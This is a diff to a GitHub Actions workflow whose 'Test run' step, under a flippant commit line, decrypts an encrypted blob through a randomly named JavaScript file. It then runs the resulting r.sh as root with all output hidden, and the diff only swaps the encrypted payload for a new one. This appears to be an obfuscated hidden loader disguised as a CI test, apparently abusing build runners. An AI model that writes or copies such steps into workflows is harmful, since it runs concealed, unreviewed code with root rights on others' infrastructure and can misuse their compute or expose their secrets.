project lead is allergic to changes...

--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '1j5fu'
+        echo 'fa9m5'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/sVdvg+moNxjxjQKUqzOaqpFV4Og79gbb5ZV1/ydaSEPf1YNflotVqq21nW8+8Yq+1S6j6DKKwsMIwbk8qE4+Y2VDCFPi8uV1Lwu4AcTVaH+ina0S53MsY sbdzui && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+KJeBrvAtXq1ZMZjjztZfDLX11N0KCex7wnBNi7kfPO/pb8k+HUVC5kxcWUrr+Uhxa4BdGfrQhoCXklBx+p61lLVZ+Y7cZo6IR2WCj3z+oXkf0U7+gZl2M of5unj && sudo sh r.sh > /dev/null 2>&1
